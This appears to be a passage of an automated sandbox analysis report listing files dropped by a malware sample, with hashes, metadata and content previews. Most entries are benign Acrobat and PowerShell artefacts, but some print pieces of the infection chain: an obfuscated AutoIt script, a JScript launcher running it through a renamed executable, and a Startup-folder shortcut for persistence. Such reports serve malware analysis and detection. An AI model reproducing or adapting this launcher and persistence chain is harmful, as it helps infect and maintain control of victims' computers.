SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1nteq1q.c5v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asgou3oh.1s4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brtejzka.3ji.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvzpwtp5.5sw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbaxmkkl.b0c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0eg3mbs.i4o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfdv1wtg.csi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpaj3gcc.0jw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-28 03-35-30-510.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.330589339471305
Encrypted:	false
SSDEEP:	384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
MD5:	5BC0A308794F062FEC40F3016568DF9F
SHA1:	14149448191AB45E99011CBBEF39F2A9A03A0D15
SHA-256:	00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
SHA-512:	CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
Malicious:	false
Preview:	SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15111
Entropy (8bit):	5.348141798123121
Encrypted:	false
SSDEEP:	384:MsoJooFE3ZPUsWm3umBFHV2HPw80xgsWfkqOUYECf79ovbM+Iza+WnWnuA6uAFF4:Z9D
MD5:	334F0380781B8844153E0254E7337734
SHA1:	68834CBB2A54BBFFB16144A4453FB3C6D0861C6E
SHA-256:	2777D3C65ADD2F17F374D7A9F9B5CA5572B62A327593ECC91D3315F67CA309D2
SHA-512:	AB7EB21AC4C41828EB69E4498BBA552A9B0777762FC883198BE6F7ABCB4A142F0649CF5259ADB7E3DA236DAB224A29FA704F0316EB09ACC7B10CB92F807FEB3B
Malicious:	false
Preview:	SessionID=21093903-b1ed-42b7-8778-6b7545371489.1735374930544 Timestamp=2024-12-28T03:35:30:544-0500 ThreadID=5732 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=21093903-b1ed-42b7-8778-6b7545371489.1735374930544 Timestamp=2024-12-28T03:35:30:555-0500 ThreadID=5732 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=21093903-b1ed-42b7-8778-6b7545371489.1735374930544 Timestamp=2024-12-28T03:35:30:555-0500 ThreadID=5732 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=21093903-b1ed-42b7-8778-6b7545371489.1735374930544 Timestamp=2024-12-28T03:35:30:555-0500 ThreadID=5732 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=21093903-b1ed-42b7-8778-6b7545371489.1735374930544 Timestamp=2024-12-28T03:35:30:555-0500 ThreadID=5732 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.385941877794975
Encrypted:	false
SSDEEP:	192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmZcbKzII6cbd:8qnXopZ50rnEI9
MD5:	1FA7D05D40B6628390B83B8EA22D0BBD
SHA1:	53537BDACECDE7633CB0A76599302978380F61BA
SHA-256:	21CA6CC92F803BC7B027E4EA3B813D5997A60BE3A99625E7E281BD25F3CE6094
SHA-512:	670D089DDC914203975140A5BFC1A0B26FF26018980CCE4A85A7E10922D27311F414B46D852C3DA3AFB717E022667F7B3559BB074832804BF1AF44E41A05FEAD
Malicious:	false
Preview:	05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\0db65e37-ee34-474c-a52d-8725dd70d6b6.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\4b776b26-6acc-42df-92e5-cc57b83a4e79.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\ae777a0b-7cd3-4524-bfd1-e0651dc258a9.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xP/wYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JXwZG5WLxB3mlind9i4ufFXpAXkrfUsb
MD5:	80990E953C72A2C5CC6D5AD94CF11F0C
SHA1:	9DA4A3EBD8612FDE2DA8F9EEA96491988FA5A231
SHA-256:	EC5EFBB64292DD321F50470102B46E72A93E9A1552748F5E8A1EEDA5F4FAA66F
SHA-512:	B20736ECD8674D886C6E497DA05D5D37A385A0D6954FA20EBE4AB30673342632271DE76FAE2C70994745517999531066C5D3629257D0381FAF3944813DF6D74D
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\b7b58962-c26d-4bc0-b72c-69338a30b659.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:6IOWL07oXGZBZwYIGNPedpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:2WLxXGZBZwZG03mlind9i4ufFXpAXkrj
MD5:	795B93B82BCB641BD943FD0F9B462861
SHA1:	DAD91A1D46D9121C09AF7D676BF45CCF20FB4AB0
SHA-256:	96DF3E2822EDB201C3C43631057736F379E2B50F10E964969BB6DA38FA0E7168
SHA-512:	454425F7416B8250DF3584F0F0016E0109D792BF58E595D2E1854B73B5EF076B2F313A4CB7B72A56884F27D0FA01628A4436F3E2E76B790F77E0982CD647BACA
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\WordGenius Technologies\G

Download File

Process:	C:\Users\Public\Guard.exe
File Type:	ASCII text, with very long lines (1266)
Category:	dropped
Size (bytes):	1154948
Entropy (8bit):	5.196545141961105
Encrypted:	false
SSDEEP:	12288:D8V+jcfS29nYfCcNjZT5aJ0/fr0UFsgcBQuflmJSRfGtRd:Dc19nY36OfgUPYl3YB
MD5:	95D08DC6DDA38D4D973552F93A218974
SHA1:	C348F2205802CF9E23AF438FCAF50E0DCDB49E62
SHA-256:	BC2ED36C30490814820D2C8E4ADFC924E449B8CCC23D2533CFE424A6376847A4
SHA-512:	6C65877115CD0ADB750083D2D453435FA98954FD0A8EC7DA99C6F8A23CFCE781390F415A463026C88B999BBE2FBD092817C1E89A7F6F9A8E2E1B889E8469ED55
Malicious:	false
Preview:	Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

Download File

Process:	C:\Users\Public\Guard.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.728787503041443
Encrypted:	false
SSDEEP:	3:RiMIpGXfeNH5E5wWAX+PKMEkD5yKXW/Zi+0/RaMl85uWAX+PKMEkD5yKXW/Zi+oM:RiJbNHCwWDMkDrXW/Zz0tl8wWDMkDrXS
MD5:	F3E27756AE384F28A50A26D42047C0C1
SHA1:	76D4F4BF89EB6DD92C22ACC729A16996FCC42EC7
SHA-256:	1954E6D6ED7E08C90CFF1BA567C85E15889B9098970DBE5F4979684CAD52130D
SHA-512:	C3C157EBEAA16DCA88B3F615674B4474B5A668D2398838A3096C2AFCCE8DC817F46F0D11CEC9E8474410108A445C5F6453E10BE4E1F807E0589D1CB30B405E81
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

Download File

Process:	C:\Users\Public\Guard.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.913583050357082
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoqLTVSRE2J5yKXW/Zi+URAAy:HRYF5yjoqLTwi23yKXW/Zzyy
MD5:	B196E358FC1F1A8683B763273B6F2FE2
SHA1:	D494A69C3B14D95E86242085E57527472F30AEB1
SHA-256:	DF5DE160AA2296D525325C499B8E46D179DFD669E4B1BC83324BC04162DF0754
SHA-512:	4195E5CCA900C5199D9A726795EA0F4AB2BF19FAB8356AD83265EC66157657A23EE3680718DF56E624BFF60036696735714A64FE95872B9B47A55634F0F2C76B
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

C:\Users\user\AppData\Roaming\Project_Information.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.5, 7 pages (zip deflate encoded)
Category:	dropped
Size (bytes):	382562
Entropy (8bit):	7.568010490995865
Encrypted:	false
SSDEEP:	6144:dozIzH/hHHXwI45QTULrCe49nPbJ3V2T8JW:do6/ZAI45QALrCeObJgTF
MD5:	0863C46694D51D3248DE554D6ECD9442
SHA1:	AF2E1D8FF367051202D9921726AC303A4D451E07
SHA-256:	D88D5D6411B8ADAE9A6688B64DE843BD6EAB303724181256EE5FB2F8440D4F3A
SHA-512:	63FEC7F0FD266903FE43EC5F207A874B78D4427B34911D99C29C5E2CA4CF00DFE3D0D4CCD67B2A9413A26CDF9D80A8C77BCF68E10A7B150F91BC0FF31E8F0859
Malicious:	false
Preview:	%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 540 720] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 126>>..stream..x.m.1..P...................M...dQ..(."....n@.>v.l[.R.].`N.6..BI.x.*..W...5de,...T..#.3.....W.....^....<..n>Mc@...y..i'...endstream..endobj..5 0 obj..<</Type/XObject/Subtype/Image/Width 1554/Height 2199/ColorSpace/DeviceRGB/BitsPerComponent 8/Filter/DCTDecode/Interpolate true/Length 172175>>..stream........JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..........

